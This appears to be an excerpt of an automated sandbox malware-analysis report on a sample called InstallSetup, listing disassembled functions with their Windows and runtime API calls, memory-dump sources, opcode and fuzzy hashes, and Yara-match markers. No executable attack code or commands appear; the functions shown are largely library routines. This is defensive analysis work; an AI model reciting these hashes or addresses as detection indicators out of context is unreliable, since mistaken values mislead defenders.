API String ID: 621396759-3071617958
Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98

Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
__CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8

Strings

version, xrefs: 00415D9F
pScheduler, xrefs: 00415DB2

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 1687795959-3154422776
Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E

Function 00975AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00975B8A
__alldvrm.LIBCMT ref: 00975D8B
__alldvrm.LIBCMT ref: 00975DAD

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction ID: d0bfe9cf5ca868c943d94e0fb4c816d7431caf5a4876eae895433ecc06208343
Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction Fuzzy Hash: 15A17C73900B869FD722DF18C8857BEBBE9EF51350F1A816DD48D9B281D2B89D41C750

Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00435923
__alldvrm.LIBCMT ref: 00435B24
__alldvrm.LIBCMT ref: 00435B46

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759

Function 0097FC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0097FD9E

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction ID: 988d5df31e6b2c284b60a51d6136b949836b2320ac5d492665f57ebbde58607e
Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction Fuzzy Hash: E2412D33A00504ABDB356FB88C56BAE37A8EF82770F24C675F82CE61D1EB34484146A1

Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FB37

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D

Function 00976B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0097047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 00976B51
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00976BDA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00976BEC
__freea.LIBCMT ref: 00976BF5

Part of subcall function 0097390E: RtlAllocateHeap.NTDLL(00000000,0094DAD7,00000000), ref: 00973940

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction ID: 10321db3b8babd5d79799430e0fb980520eef067799be36f9602406ff1cf528c
Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction Fuzzy Hash: 6131D032A0060AABDF25CF69CC41EAE7BA9EB81710B158278FC08D7150EB35DD54CB90

Function 0094D652 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0094D6AA
__Xtime_diff_to_millis2.LIBCPMT ref: 0094D6C4
_xtime_get.LIBCPMT ref: 0094D6E7
__Xtime_diff_to_millis2.LIBCPMT ref: 0094D6F3

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction ID: 768a663444b6cad15b76fb1bd083c74e52f2b45da3cc13c9ffc616190d71622d
Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction Fuzzy Hash: A2212F75A011199FDF01EF94DC82EBEB7B9FF49714F100065F505A7291DB74AD019B90

Function 0040D3EB Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0040D443
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D45D
_xtime_get.LIBCPMT ref: 0040D480
__Xtime_diff_to_millis2.LIBCPMT ref: 0040D48C

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5

Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000), ref: 00423739
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721

Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
String ID:
API String ID: 2630251706-0
Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98

Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401FAF
UpdateWindow.USER32 ref: 00401FB7
ShowWindow.USER32(00000000), ref: 00401FCB
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID:
API String ID: 1339878773-0
Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C

Function 00969330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0096934A

Part of subcall function 00969297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 009692C6
Part of subcall function 00969297: ___AdjustPointer.LIBCMT ref: 009692E1

_UnwindNestedFrames.LIBCMT ref: 0096935F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00969370
CallCatchBlock.LIBVCRUNTIME ref: 00969398

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 520432de0fde301552268e432581d634d221317a9d683c6399ebb57f912cd879
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 76011332100148BBCF126E95CC42EEB3F6DEF88754F044018FE58AA221D332E861EBA0

Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004290E3

Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A

_UnwindNestedFrames.LIBCMT ref: 004290F8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
CallCatchBlock.LIBVCRUNTIME ref: 00429131

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8

Function 00975196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0097513D,00000000,00000000,00000000,00000000,?,009753F5,00000006,0044A378), ref: 009751C8
GetLastError.KERNEL32(?,0097513D,00000000,00000000,00000000,00000000,?,009753F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,00972213), ref: 009751D4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0097513D,00000000,00000000,00000000,00000000,?,009753F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 009751E2

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: c17681c470e04d7490bf397dccdd156e7b77744a9e41f5788b18654674f67f12
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 8E014C376066226BC7604F689C44F567B9CAF06F637224630F81DD3141C760DD00C6E4

Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC

Function 00966395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 009663AF
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 009663C3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 009663DB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 009663F3

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: 448cd17333f7ebe6b163d67e82a5e43c49813308fb8f913f1dd5334d78c10847
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 3201A232600114A7CF16EE959841FAF779D9B95350F000016FC11A7392DA71ED1496A0

Function 00962B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 00962BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00962BCF

Part of subcall function 00958687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 009586A8
Part of subcall function 00958687: Hash.LIBCMT ref: 009586E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00962BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00962BF8

Part of subcall function 0095F6DF: Hash.LIBCMT ref: 0095F6F1

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction ID: 7864472d4d4a0498b76f7596ba925d78c216768d1ca66f2f9cdd2051225573f2
Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction Fuzzy Hash: 08118E76800604AFC715DF65C881ACAF7F8FF99320F00465EE95687592DB70E904CBA0

Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8

Function 00962B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 00962BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00962BCF

Part of subcall function 00958687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 009586A8
Part of subcall function 00958687: Hash.LIBCMT ref: 009586E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00962BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00962BF8

Part of subcall function 0095F6DF: Hash.LIBCMT ref: 0095F6F1

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction ID: 03ee0beec513a142b84d7f9bcc11388b72cba662d5658f61f0aa3558ba285231
Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction Fuzzy Hash: 4F012976800604ABC714DF65C882EDAF7E8FF99320F008A1EE55A97551DB70F944CB60

Function 009450CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 009450D1

Part of subcall function 0094BDAE: __EH_prolog3_GS.LIBCMT ref: 0094BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 0094511C
__Getcoll.LIBCPMT ref: 0094512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0094513B

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction ID: 87241bcddf05a63c0f13cdd2a9e6011441864e596ec978a078e697673e2bd80c
Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction Fuzzy Hash: 7F019AB1D15709EFDB00EFA4C481FACB7B4BF98312F108029E055AB282CBB49944CB95

Function 00945B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00945B8D

Part of subcall function 0094BDAE: __EH_prolog3_GS.LIBCMT ref: 0094BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 00945BD8
__Getcoll.LIBCPMT ref: 00945BE7
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00945BF7

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction ID: 671f352f06152316cd7ae47ff7d118de36ca567898cc96c42e1095a99f2c0301
Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction Fuzzy Hash: FE015E71D11709DFDF00EFA4C485F9DB7B4BF94316F108029E4556B282DBB49944CB95

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00405926

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
__Getcoll.LIBCPMT ref: 00405980
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98

Function 0095C13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0095C170
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0095C180
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0095C190
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0095C1A4

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: 9f74fd6263af2c5ee027ac568af316a03c3cc79fdd3fc45dcd69313b11066a63
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: A501C9BA408749BFDF12DE96DC029AD3B6AAF45352F148411FD1884072D732CAB8ABC1

Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D

Function 0094D486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00951342

Part of subcall function 00950BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00950BD6
Part of subcall function 00950BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00950BF7

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00951355
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00951361
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0095136A

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction ID: 76569c68a497605f4939feb0bc61114eac195026ed98c4de83c658ddcc694f6d
Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction Fuzzy Hash: 24F02430600305A7CF14FBB60862B7D31A66FC1311F040079BD119F3C1CE749D0893A4

